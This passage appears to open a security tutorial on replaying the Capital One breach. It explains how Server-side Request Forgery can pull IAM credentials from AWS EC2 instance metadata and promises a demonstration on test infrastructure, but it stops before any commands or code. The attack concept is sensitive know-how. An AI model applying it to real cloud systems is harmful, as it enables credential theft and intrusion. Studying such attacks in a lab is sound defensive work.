SSRF attack on AWS: Replaying Capital One hack for stealing EC2 metadata

Unless you have been hiding in a cave or not even remotely security-minded, you would have heard the news about the Capital One hack. It was possibly a Server-side Request Forgery (SSRF) attack on AWS hosted application server orchestrated by an ex-Amazon employee — Paige Thompson.

SSRF is an application attack whereby a hacker can abuse functionality on an application server to read or update internal resources. According to the federal complaint for the Capital One hack, the internal resources obtained in this case by the hacker were the security credentials of an AWS IAM role using AWS’s metadata stored on the virtual machine.

“The impact of SSRF is being worsened by the offering of public clouds, and the major players like AWS are not doing anything to fix it. The problem is common and well-known, but hard to prevent and does not have any mitigations built into the AWS platform.” [2]

Questions are raised by many regarding the responsibility of Amazon to mitigate SSRF attacks as it was a previously known attack vector to steal EC2 metadata. I will let you be the judge of that but using this article I wish to demonstrate how you can perform a SSRF attack on your test AWS infrastructure in order to remotely retrieve the metadata stored on the EC2 instance, and further…